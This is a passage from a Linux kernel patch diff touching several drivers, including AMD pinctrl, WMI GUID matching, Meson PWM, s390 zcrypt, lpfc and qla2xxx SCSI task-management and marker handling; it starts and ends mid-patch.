+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+-{
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+-	unsigned long flags;
+-	u32 pin_reg, mask;
+-	int i;
+-
+-	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+-		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+-		BIT(WAKE_CNTRL_OFF_S4);
+-
+-	for (i = 0; i < desc->npins; i++) {
+-		int pin = desc->pins[i].number;
+-		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+-
+-		if (!pd)
+-			continue;
+-
+-		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+-
+-		pin_reg = readl(gpio_dev->base + i * 4);
+-		pin_reg &= ~mask;
+-		writel(pin_reg, gpio_dev->base + i * 4);
+-
+-		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-	}
+-}
+-
+ #ifdef CONFIG_PM_SLEEP
+ static bool amd_gpio_should_save(struct amd_gpio *gpio_dev, unsigned int pin)
+ {
+@@ -1130,9 +1099,6 @@ static int amd_gpio_probe(struct platform_device *pdev)
+ 		return PTR_ERR(gpio_dev->pctrl);
+ 	}
+ 
+-	/* Disable and mask interrupts */
+-	amd_gpio_irq_init(gpio_dev);
+-
+ 	girq = &gpio_dev->gc.irq;
+ 	gpio_irq_chip_set_chip(girq, &amd_gpio_irqchip);
+ 	/* This will let us handle the parent IRQ in the driver */
+diff --git a/drivers/pinctrl/pinctrl-amd.h b/drivers/pinctrl/pinctrl-amd.h
+index c8635998465db..34c5c3e71fb26 100644
+--- a/drivers/pinctrl/pinctrl-amd.h
++++ b/drivers/pinctrl/pinctrl-amd.h
+@@ -17,6 +17,7 @@
+ #define AMD_GPIO_PINS_BANK3     32
+ 
+ #define WAKE_INT_MASTER_REG 0xfc
++#define INTERNAL_GPIO0_DEBOUNCE (1 << 15)
+ #define EOI_MASK (1 << 29)
+ 
+ #define WAKE_INT_STATUS_REG0 0x2f8
+@@ -35,13 +36,13 @@
+ #define WAKE_CNTRL_OFF_S4               15
+ #define PIN_STS_OFF			16
+ #define DRV_STRENGTH_SEL_OFF		17
+-#define PULL_UP_SEL_OFF			19
+ #define PULL_UP_ENABLE_OFF		20
+ #define PULL_DOWN_ENABLE_OFF		21
+ #define OUTPUT_VALUE_OFF		22
+ #define OUTPUT_ENABLE_OFF		23
+ #define SW_CNTRL_IN_OFF			24
+ #define SW_CNTRL_EN_OFF			25
++#define WAKECNTRL_Z_OFF			27
+ #define INTERRUPT_STS_OFF		28
+ #define WAKE_STS_OFF			29
+ 
+diff --git a/drivers/platform/x86/wmi.c b/drivers/platform/x86/wmi.c
+index 223550a10d4dd..2fe6e147785e4 100644
+--- a/drivers/platform/x86/wmi.c
++++ b/drivers/platform/x86/wmi.c
+@@ -135,6 +135,16 @@ static acpi_status find_guid(const char *guid_string, struct wmi_block **out)
+ 	return AE_NOT_FOUND;
+ }
+ 
++static bool guid_parse_and_compare(const char *string, const guid_t *guid)
++{
++	guid_t guid_input;
++
++	if (guid_parse(string, &guid_input))
++		return false;
++
++	return guid_equal(&guid_input, guid);
++}
++
+ static const void *find_guid_context(struct wmi_block *wblock,
+ 				     struct wmi_driver *wdriver)
+ {
+@@ -145,11 +155,7 @@ static const void *find_guid_context(struct wmi_block *wblock,
+ 		return NULL;
+ 
+ 	while (*id->guid_string) {
+-		guid_t guid_input;
+-
+-		if (guid_parse(id->guid_string, &guid_input))
+-			continue;
+-		if (guid_equal(&wblock->gblock.guid, &guid_input))
++		if (guid_parse_and_compare(id->guid_string, &wblock->gblock.guid))
+ 			return id->context;
+ 		id++;
+ 	}
+@@ -833,11 +839,7 @@ static int wmi_dev_match(struct device *dev, struct device_driver *driver)
+ 		return 0;
+ 
+ 	while (*id->guid_string) {
+-		guid_t driver_guid;
+-
+-		if (WARN_ON(guid_parse(id->guid_string, &driver_guid)))
+-			continue;
+-		if (guid_equal(&driver_guid, &wblock->gblock.guid))
++		if (guid_parse_and_compare(id->guid_string, &wblock->gblock.guid))
+ 			return 1;
+ 
+ 		id++;
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 5732300eb0046..33107204a951d 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -156,8 +156,9 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 			  const struct pwm_state *state)
+ {
+ 	struct meson_pwm_channel *channel = &meson->channels[pwm->hwpwm];
+-	unsigned int duty, period, pre_div, cnt, duty_cnt;
++	unsigned int pre_div, cnt, duty_cnt;
+ 	unsigned long fin_freq;
++	u64 duty, period;
+ 
+ 	duty = state->duty_cycle;
+ 	period = state->period;
+@@ -179,19 +180,19 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 
+ 	dev_dbg(meson->chip.dev, "fin_freq: %lu Hz\n", fin_freq);
+ 
+-	pre_div = div64_u64(fin_freq * (u64)period, NSEC_PER_SEC * 0xffffLL);
++	pre_div = div64_u64(fin_freq * period, NSEC_PER_SEC * 0xffffLL);
+ 	if (pre_div > MISC_CLK_DIV_MASK) {
+ 		dev_err(meson->chip.dev, "unable to get period pre_div\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	cnt = div64_u64(fin_freq * (u64)period, NSEC_PER_SEC * (pre_div + 1));
++	cnt = div64_u64(fin_freq * period, NSEC_PER_SEC * (pre_div + 1));
+ 	if (cnt > 0xffff) {
+ 		dev_err(meson->chip.dev, "unable to get period cnt\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	dev_dbg(meson->chip.dev, "period=%u pre_div=%u cnt=%u\n", period,
++	dev_dbg(meson->chip.dev, "period=%llu pre_div=%u cnt=%u\n", period,
+ 		pre_div, cnt);
+ 
+ 	if (duty == period) {
+@@ -204,14 +205,13 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 		channel->lo = cnt;
+ 	} else {
+ 		/* Then check is we can have the duty with the same pre_div */
+-		duty_cnt = div64_u64(fin_freq * (u64)duty,
+-				     NSEC_PER_SEC * (pre_div + 1));
++		duty_cnt = div64_u64(fin_freq * duty, NSEC_PER_SEC * (pre_div + 1));
+ 		if (duty_cnt > 0xffff) {
+ 			dev_err(meson->chip.dev, "unable to get duty cycle\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		dev_dbg(meson->chip.dev, "duty=%u pre_div=%u duty_cnt=%u\n",
++		dev_dbg(meson->chip.dev, "duty=%llu pre_div=%u duty_cnt=%u\n",
+ 			duty, pre_div, duty_cnt);
+ 
+ 		channel->pre_div = pre_div;
+@@ -351,18 +351,8 @@ static int meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	channel->lo = FIELD_GET(PWM_LOW_MASK, value);
+ 	channel->hi = FIELD_GET(PWM_HIGH_MASK, value);
+ 
+-	if (channel->lo == 0) {
+-		state->period = meson_pwm_cnt_to_ns(chip, pwm, channel->hi);
+-		state->duty_cycle = state->period;
+-	} else if (channel->lo >= channel->hi) {
+-		state->period = meson_pwm_cnt_to_ns(chip, pwm,
+-						    channel->lo + channel->hi);
+-		state->duty_cycle = meson_pwm_cnt_to_ns(chip, pwm,
+-							channel->hi);
+-	} else {
+-		state->period = 0;
+-		state->duty_cycle = 0;
+-	}
++	state->period = meson_pwm_cnt_to_ns(chip, pwm, channel->lo + channel->hi);
++	state->duty_cycle = meson_pwm_cnt_to_ns(chip, pwm, channel->hi);
+ 
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 
+diff --git a/drivers/s390/crypto/zcrypt_msgtype6.c b/drivers/s390/crypto/zcrypt_msgtype6.c
+index 5ad2514775931..f99a9ef42116f 100644
+--- a/drivers/s390/crypto/zcrypt_msgtype6.c
++++ b/drivers/s390/crypto/zcrypt_msgtype6.c
+@@ -1188,6 +1188,9 @@ static long zcrypt_msgtype6_send_cprb(bool userspace, struct zcrypt_queue *zq,
+ 		ap_cancel_message(zq->queue, ap_msg);
+ 	}
+ 
++	if (rc == -EAGAIN && ap_msg->flags & AP_MSG_FLAG_ADMIN)
++		rc = -EIO; /* do not retry administrative requests */
++
+ out:
+ 	if (rc)
+ 		ZCRYPT_DBF_DBG("%s send cprb at dev=%02x.%04x rc=%d\n",
+@@ -1308,6 +1311,9 @@ static long zcrypt_msgtype6_send_ep11_cprb(bool userspace, struct zcrypt_queue *
+ 		ap_cancel_message(zq->queue, ap_msg);
+ 	}
+ 
++	if (rc == -EAGAIN && ap_msg->flags & AP_MSG_FLAG_ADMIN)
++		rc = -EIO; /* do not retry administrative requests */
++
+ out:
+ 	if (rc)
+ 		ZCRYPT_DBF_DBG("%s send cprb at dev=%02x.%04x rc=%d\n",
+diff --git a/drivers/scsi/lpfc/lpfc_crtn.h b/drivers/scsi/lpfc/lpfc_crtn.h
+index d2d207791056c..3a5650e0e2076 100644
+--- a/drivers/scsi/lpfc/lpfc_crtn.h
++++ b/drivers/scsi/lpfc/lpfc_crtn.h
+@@ -134,7 +134,6 @@ void lpfc_check_nlp_post_devloss(struct lpfc_vport *vport,
+ 				 struct lpfc_nodelist *ndlp);
+ void lpfc_ignore_els_cmpl(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+ 			  struct lpfc_iocbq *rspiocb);
+-int  lpfc_nlp_not_used(struct lpfc_nodelist *ndlp);
+ struct lpfc_nodelist *lpfc_setup_disc_node(struct lpfc_vport *, uint32_t);
+ void lpfc_disc_list_loopmap(struct lpfc_vport *);
+ void lpfc_disc_start(struct lpfc_vport *);
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index e21c73a3803ec..43ebb41ded593 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -5150,14 +5150,9 @@ lpfc_els_free_iocb(struct lpfc_hba *phba, struct lpfc_iocbq *elsiocb)
+  *
+  * This routine is the completion callback function to the Logout (LOGO)
+  * Accept (ACC) Response ELS command. This routine is invoked to indicate
+- * the completion of the LOGO process. It invokes the lpfc_nlp_not_used() to
+- * release the ndlp if it has the last reference remaining (reference count
+- * is 1). If succeeded (meaning ndlp released), it sets the iocb ndlp
+- * field to NULL to inform the following lpfc_els_free_iocb() routine no
+- * ndlp reference count needs to be decremented. Otherwise, the ndlp
+- * reference use-count shall be decremented by the lpfc_els_free_iocb()
+- * routine. Finally, the lpfc_els_free_iocb() is invoked to release the
+- * IOCB data structure.
++ * the completion of the LOGO process. If the node has transitioned to NPR,
++ * this routine unregisters the RPI if it is still registered. The
++ * lpfc_els_free_iocb() is invoked to release the IOCB data structure.
+  **/
+ static void
+ lpfc_cmpl_els_logo_acc(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+@@ -5198,19 +5193,9 @@ lpfc_cmpl_els_logo_acc(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+ 		    (ndlp->nlp_last_elscmd == ELS_CMD_PLOGI))
+ 			goto out;
+ 
+-		/* NPort Recovery mode or node is just allocated */
+-		if (!lpfc_nlp_not_used(ndlp)) {
+-			/* A LOGO is completing and the node is in NPR state.
+-			 * Just unregister the RPI because the node is still
+-			 * required.
+-			 */
++		if (ndlp->nlp_flag & NLP_RPI_REGISTERED)
+ 			lpfc_unreg_rpi(vport, ndlp);
+-		} else {
+-			/* Indicate the node has already released, should
+-			 * not reference to it from within lpfc_els_free_iocb.
+-			 */
+-			cmdiocb->ndlp = NULL;
+-		}
++
+ 	}
+  out:
+ 	/*
+@@ -5230,9 +5215,8 @@ lpfc_cmpl_els_logo_acc(struct lpfc_hba *phba, struct lpfc_iocbq *cmdiocb,
+  * RPI (Remote Port Index) mailbox command to the @phba. It simply releases
+  * the associated lpfc Direct Memory Access (DMA) buffer back to the pool and
+  * decrements the ndlp reference count held for this completion callback
+- * function. After that, it invokes the lpfc_nlp_not_used() to check
+- * whether there is only one reference left on the ndlp. If so, it will
+- * perform one more decrement and trigger the release of the ndlp.
++ * function. After that, it invokes the lpfc_drop_node to check
++ * whether it is appropriate to release the node.
+  **/
+ void
+ lpfc_mbx_cmpl_dflt_rpi(struct lpfc_hba *phba, LPFC_MBOXQ_t *pmb)
+diff --git a/drivers/scsi/lpfc/lpfc_hbadisc.c b/drivers/scsi/lpfc/lpfc_hbadisc.c
+index d38ebd7281b9b..549fa7d6c0f6f 100644
+--- a/drivers/scsi/lpfc/lpfc_hbadisc.c
++++ b/drivers/scsi/lpfc/lpfc_hbadisc.c
+@@ -4332,13 +4332,14 @@ out:
+ 
+ 		/* If the node is not registered with the scsi or nvme
+ 		 * transport, remove the fabric node.  The failed reg_login
+-		 * is terminal.
++		 * is terminal and forces the removal of the last node
++		 * reference.
+ 		 */
+ 		if (!(ndlp->fc4_xpt_flags & (SCSI_XPT_REGD | NVME_XPT_REGD))) {
+ 			spin_lock_irq(&ndlp->lock);
+ 			ndlp->nlp_flag &= ~NLP_NPR_2B_DISC;
+ 			spin_unlock_irq(&ndlp->lock);
+-			lpfc_nlp_not_used(ndlp);
++			lpfc_nlp_put(ndlp);
+ 		}
+ 
+ 		if (phba->fc_topology == LPFC_TOPOLOGY_LOOP) {
+@@ -6703,25 +6704,6 @@ lpfc_nlp_put(struct lpfc_nodelist *ndlp)
+ 	return ndlp ? kref_put(&ndlp->kref, lpfc_nlp_release) : 0;
+ }
+ 
+-/* This routine free's the specified nodelist if it is not in use
+- * by any other discovery thread. This routine returns 1 if the
+- * ndlp has been freed. A return value of 0 indicates the ndlp is
+- * not yet been released.
+- */
+-int
+-lpfc_nlp_not_used(struct lpfc_nodelist *ndlp)
+-{
+-	lpfc_debugfs_disc_trc(ndlp->vport, LPFC_DISC_TRC_NODE,
+-		"node not used:   did:x%x flg:x%x refcnt:x%x",
+-		ndlp->nlp_DID, ndlp->nlp_flag,
+-		kref_read(&ndlp->kref));
+-
+-	if (kref_read(&ndlp->kref) == 1)
+-		if (lpfc_nlp_put(ndlp))
+-			return 1;
+-	return 0;
+-}
+-
+ /**
+  * lpfc_fcf_inuse - Check if FCF can be unregistered.
+  * @phba: Pointer to hba context object.
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 64355d0baa5fb..d2c7de804b998 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -402,6 +402,11 @@ static void mpi3mr_process_admin_reply_desc(struct mpi3mr_ioc *mrioc,
+ 				memcpy((u8 *)cmdptr->reply, (u8 *)def_reply,
+ 				    mrioc->reply_sz);
+ 			}
++			if (sense_buf && cmdptr->sensebuf) {
++				cmdptr->is_sense = 1;
++				memcpy(cmdptr->sensebuf, sense_buf,
++				       MPI3MR_SENSE_BUF_SZ);
++			}
+ 			if (cmdptr->is_waiting) {
+ 				complete(&cmdptr->done);
+ 				cmdptr->is_waiting = 0;
+diff --git a/drivers/scsi/qla2xxx/qla_attr.c b/drivers/scsi/qla2xxx/qla_attr.c
+index b67ad30d56e6f..64734d6e8ccb1 100644
+--- a/drivers/scsi/qla2xxx/qla_attr.c
++++ b/drivers/scsi/qla2xxx/qla_attr.c
+@@ -2750,6 +2750,7 @@ static void
+ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ {
+ 	fc_port_t *fcport = *(fc_port_t **)rport->dd_data;
++	scsi_qla_host_t *vha;
+ 
+ 	if (!fcport)
+ 		return;
+@@ -2759,9 +2760,12 @@ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ 
+ 	if (test_bit(ABORT_ISP_ACTIVE, &fcport->vha->dpc_flags))
+ 		return;
++	vha = fcport->vha;
+ 
+ 	if (unlikely(pci_channel_offline(fcport->vha->hw->pdev))) {
+ 		qla2x00_abort_all_cmds(fcport->vha, DID_NO_CONNECT << 16);
++		qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24,
++			0, WAIT_TARGET);
+ 		return;
+ 	}
+ 	/*
+@@ -2786,6 +2790,15 @@ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ 			qla2x00_port_logout(fcport->vha, fcport);
+ 		}
+ 	}
++
++	/* check for any straggling io left behind */
++	if (qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24, 0, WAIT_TARGET)) {
++		ql_log(ql_log_warn, vha, 0x300b,
++		       "IO not return.  Resetting. \n");
++		set_bit(ISP_ABORT_NEEDED, &vha->dpc_flags);
++		qla2xxx_wake_dpc(vha);
++		qla2x00_wait_for_chip_reset(vha);
++	}
+ }
+ 
+ static int
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index dba7bba788d76..19bb64bdd88b1 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -283,6 +283,10 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
++		if (!rport) {
++			rval = -ENOMEM;
++			goto done;
++		}
+ 		fcport = *(fc_port_t **) rport->dd_data;
+ 		host = rport_to_shost(rport);
+ 		vha = shost_priv(host);
+@@ -2992,6 +2996,8 @@ qla24xx_bsg_request(struct bsg_job *bsg_job)
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
++		if (!rport)
++			return ret;
+ 		host = rport_to_shost(rport);
+ 		vha = shost_priv(host);
+ 	} else {
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index cd4eb11b07079..5a2f629d18e69 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -457,6 +457,15 @@ static inline be_id_t port_id_to_be_id(port_id_t port_id)
+ 	return res;
+ }
+ 
++struct tmf_arg {
++	struct qla_qpair *qpair;
++	struct fc_port *fcport;
++	struct scsi_qla_host *vha;
++	u64 lun;
++	u32 flags;
++	uint8_t modifier;
++};
++
+ struct els_logo_payload {
+ 	uint8_t opcode;
+ 	uint8_t rsvd[3];
+@@ -536,6 +545,10 @@ struct srb_iocb {
+ 			uint32_t data;
+ 			struct completion comp;
+ 			__le16 comp_status;
++
++			uint8_t modifier;
++			uint8_t vp_index;
++			uint16_t loop_id;
+ 		} tmf;
+ 		struct {
+ #define SRB_FXDISC_REQ_DMA_VALID	BIT_0
+@@ -639,6 +652,7 @@ struct srb_iocb {
+ #define SRB_SA_UPDATE	25
+ #define SRB_ELS_CMD_HST_NOLOGIN 26
+ #define SRB_SA_REPLACE	27
++#define SRB_MARKER	28
+ 
+ struct qla_els_pt_arg {
+ 	u8 els_opcode;
+@@ -681,7 +695,6 @@ typedef struct srb {
+ 	struct iocb_resource iores;
+ 	struct kref cmd_kref;	/* need to migrate ref_count over to this */
+ 	void *priv;
+-	wait_queue_head_t nvme_ls_waitq;
+ 	struct fc_port *fcport;
+ 	struct scsi_qla_host *vha;
+ 	unsigned int start_timer:1;
+@@ -2521,6 +2534,7 @@ enum rscn_addr_format {
+ typedef struct fc_port {
+ 	struct list_head list;
+ 	struct scsi_qla_host *vha;
++	struct list_head tmf_pending;
+ 
+ 	unsigned int conf_compl_supported:1;
+ 	unsigned int deleted:2;
+@@ -2541,6 +2555,8 @@ typedef struct fc_port {
+ 	unsigned int do_prli_nvme:1;
+ 
+ 	uint8_t nvme_flag;
++	uint8_t active_tmf;
++#define MAX_ACTIVE_TMF 8
+ 
+ 	uint8_t node_name[WWN_SIZE];
+ 	uint8_t port_name[WWN_SIZE];
+@@ -5482,4 +5498,8 @@ struct ql_vnd_tgt_stats_resp {
+ 	_fp->disc_state, _fp->scan_state, _fp->loop_id, _fp->deleted, \
+ 	_fp->flags
+ 
++#define TMF_NOT_READY(_fcport) \
++	(!_fcport || IS_SESSION_DELETED(_fcport) || atomic_read(&_fcport->state) != FCS_ONLINE || \
++	!_fcport->vha->hw->flags.fw_started)
++
+ #endif
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index 1cafd27d5a609..7aee4d093969a 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -2319,8 +2319,8 @@ qla24xx_issue_sa_replace_iocb(scsi_qla_host_t *vha, struct qla_work_evt *e)
+ 	if (!sa_ctl) {
+ 		ql_dbg(ql_dbg_edif, vha, 0x70e6,
+ 		    "sa_ctl allocation failed\n");
+-		rval =  -ENOMEM;
+-		goto done;
++		rval = -ENOMEM;
++		return rval;
+ 	}
+ 
+ 	fcport = sa_ctl->fcport;
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index ee54207fc5319..316122709b0e6 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -69,7 +69,7 @@ extern int qla2x00_async_logout(struct scsi_qla_host *, fc_port_t *);
+ extern int qla2x00_async_prlo(struct scsi_qla_host *, fc_port_t *);
+ extern int qla2x00_async_adisc(struct scsi_qla_host *, fc_port_t *,
+     uint16_t *);
+-extern int qla2x00_async_tm_cmd(fc_port_t *, uint32_t, uint32_t, uint32_t);
++extern int qla2x00_async_tm_cmd(fc_port_t *, uint32_t, uint64_t, uint32_t);
+ struct qla_work_evt *qla2x00_alloc_work(struct scsi_qla_host *,
+     enum qla_work_type);
+ extern int qla24xx_async_gnl(struct scsi_qla_host *, fc_port_t *);
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 93f7f3dd5d82b..b597c782b95ee 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1997,6 +1997,11 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 	int rc, h;
+ 	unsigned long flags;
+ 
++	if (sp->type == SRB_MARKER) {
++		complete(&tmf->u.tmf.comp);
++		return;
++	}
++
+ 	rc = qla24xx_async_abort_cmd(sp, false);
+ 	if (rc) {
+ 		spin_lock_irqsave(sp->qpair->qp_lock_ptr, flags);
+@@ -2014,24 +2019,131 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 	}
+ }
+ 
++static void qla_marker_sp_done(srb_t *sp, int res)
++{
++	struct srb_iocb *tmf = &sp->u.iocb_cmd;
++
++	if (res != QLA_SUCCESS)
++		ql_dbg(ql_dbg_taskm, sp->vha, 0x8004,
++		    "Async-marker fail hdl=%x portid=%06x ctrl=%x lun=%lld qp=%d.\n",
++		    sp->handle, sp->fcport->d_id.b24, sp->u.iocb_cmd.u.tmf.flags,
++		    sp->u.iocb_cmd.u.tmf.lun, sp->qpair->id);
++
++	sp->u.iocb_cmd.u.tmf.data = res;
++	complete(&tmf->u.tmf.comp);
++}
++
++#define  START_SP_W_RETRIES(_sp, _rval) \
++{\
++	int cnt = 5; \
++	do { \
++		_rval = qla2x00_start_sp(_sp); \
++		if (_rval == EAGAIN) \
++			msleep(1); \
++		else \
++			break; \
++		cnt--; \
++	} while (cnt); \
++}
++
++/**
++ * qla26xx_marker: send marker IOCB and wait for the completion of it.
++ * @arg: pointer to argument list.
++ *    It is assume caller will provide an fcport pointer and modifier
++ */
++static int
++qla26xx_marker(struct tmf_arg *arg)
++{
++	struct scsi_qla_host *vha = arg->vha;
++	struct srb_iocb *tm_iocb;
++	srb_t *sp;
++	int rval = QLA_FUNCTION_FAILED;
++	fc_port_t *fcport = arg->fcport;
++
++	if (TMF_NOT_READY(arg->fcport)) {
++		ql_dbg(ql_dbg_taskm, vha, 0x8039,
++		    "FC port not ready for marker loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d.\n",
++		    fcport->loop_id, fcport->d_id.b24,
++		    arg->modifier, arg->lun, arg->qpair->id);
++		return QLA_SUSPENDED;
++	}
++
++	/* ref: INIT */
++	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
++	if (!sp)
++		goto done;
++
++	sp->type = SRB_MARKER;
++	sp->name = "marker";
++	qla2x00_init_async_sp(sp, qla2x00_get_async_timeout(vha), qla_marker_sp_done);
++	sp->u.iocb_cmd.timeout = qla2x00_tmf_iocb_timeout;
++
++	tm_iocb = &sp->u.iocb_cmd;
++	init_completion(&tm_iocb->u.tmf.comp);
++	tm_iocb->u.tmf.modifier = arg->modifier;
++	tm_iocb->u.tmf.lun = arg->lun;
++	tm_iocb->u.tmf.loop_id = fcport->loop_id;
++	tm_iocb->u.tmf.vp_index = vha->vp_idx;
++
++	START_SP_W_RETRIES(sp, rval);
++
++	ql_dbg(ql_dbg_taskm, vha, 0x8006,
++	    "Async-marker hdl=%x loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d rval %d.\n",
++	    sp->handle, fcport->loop_id, fcport->d_id.b24,
++	    arg->modifier, arg->lun, sp->qpair->id, rval);
++
++	if (rval != QLA_SUCCESS) {
++		ql_log(ql_log_warn, vha, 0x8031,
++		    "Marker IOCB send failure (%x).\n", rval);
++		goto done_free_sp;
++	}
++
++	wait_for_completion(&tm_iocb->u.tmf.comp);
++	rval = tm_iocb->u.tmf.data;
++
++	if (rval != QLA_SUCCESS) {
++		ql_log(ql_log_warn, vha, 0x8019,
++		    "Marker failed hdl=%x loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d rval %d.\n",
++		    sp->handle, fcport->loop_id, fcport->d_id.b24,
++		    arg->modifier, arg->lun, sp->qpair->id, rval);
++	}
++
++done_free_sp:
++	/* ref: INIT */
++	kref_put(&sp->cmd_kref, qla2x00_sp_release);
++done:
++	return rval;
++}
++
+ static void qla2x00_tmf_sp_done(srb_t *sp, int res)
+ {
+ 	struct srb_iocb *tmf = &sp->u.iocb_cmd;
+ 
++	if (res)
++		tmf->u.tmf.data = res;
+ 	complete(&tmf->u.tmf.comp);
+ }
+ 
+-int
+-qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+-	uint32_t tag)
++static int
++__qla2x00_async_tm_cmd(struct tmf_arg *arg)
+ {
+-	struct scsi_qla_host *vha = fcport->vha;
++	struct scsi_qla_host *vha = arg->vha;
+ 	struct srb_iocb *tm_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+ 
++	fc_port_t *fcport = arg->fcport;
++
++	if (TMF_NOT_READY(arg->fcport)) {
++		ql_dbg(ql_dbg_taskm, vha, 0x8032,
++		    "FC port not ready for TM command loop-id=%x portid=%06x modifier=%x lun=%lld qp=%d.\n",
++		    fcport->loop_id, fcport->d_id.b24,
++		    arg->modifier, arg->lun, arg->qpair->id);
++		return QLA_SUSPENDED;
++	}
++
+ 	/* ref: INIT */
+-	sp = qla2x00_get_sp(vha, fcport, GFP_KERNEL);
++	sp = qla2xxx_get_qpair_sp(vha, arg->qpair, fcport, GFP_KERNEL);
+ 	if (!sp)
+ 		goto done;
+ 
+@@ -2044,15 +2156,16 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ 
+ 	tm_iocb = &sp->u.iocb_cmd;
+ 	init_completion(&tm_iocb->u.tmf.comp);
+-	tm_iocb->u.tmf.flags = flags;
+-	tm_iocb->u.tmf.lun = lun;
++	tm_iocb->u.tmf.flags = arg->flags;
++	tm_iocb->u.tmf.lun = arg->lun;
++
++	START_SP_W_RETRIES(sp, rval);
+ 
+ 	ql_dbg(ql_dbg_taskm, vha, 0x802f,
+-	    "Async-tmf hdl=%x loop-id=%x portid=%02x%02x%02x.\n",
+-	    sp->handle, fcport->loop_id, fcport->d_id.b.domain,
+-	    fcport->d_id.b.area, fcport->d_id.b.al_pa);
++	    "Async-tmf hdl=%x loop-id=%x portid=%06x ctrl=%x lun=%lld qp=%d rval=%x.\n",
++	    sp->handle, fcport->loop_id, fcport->d_id.b24,
++	    arg->flags, arg->lun, sp->qpair->id, rval);
+ 
+-	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS)
+ 		goto done_free_sp;
+ 	wait_for_completion(&tm_iocb->u.tmf.comp);
+@@ -2064,15 +2177,8 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ 		    "TM IOCB failed (%x).\n", rval);
+ 	}
+ 
+-	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw)) {
+-		flags = tm_iocb->u.tmf.flags;
+-		lun = (uint16_t)tm_iocb->u.tmf.lun;
+-
+-		/* Issue Marker IOCB */
+-		qla2x00_marker(vha, vha->hw->base_qpair,
+-		    fcport->loop_id, lun,
+-		    flags == TCF_LUN_RESET ? MK_SYNC_ID_LUN : MK_SYNC_ID);
+-	}
++	if (!test_bit(UNLOADING, &vha->dpc_flags) && !IS_QLAFX00(vha->hw))
++		rval = qla26xx_marker(arg);
+ 
+ done_free_sp:
+ 	/* ref: INIT */
+@@ -2081,6 +2187,115 @@ done:
+ 	return rval;
+ }
+ 
++static void qla_put_tmf(fc_port_t *fcport)
++{
++	struct scsi_qla_host *vha = fcport->vha;
++	struct qla_hw_data *ha = vha->hw;
++	unsigned long flags;
++
++	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
++	fcport->active_tmf--;
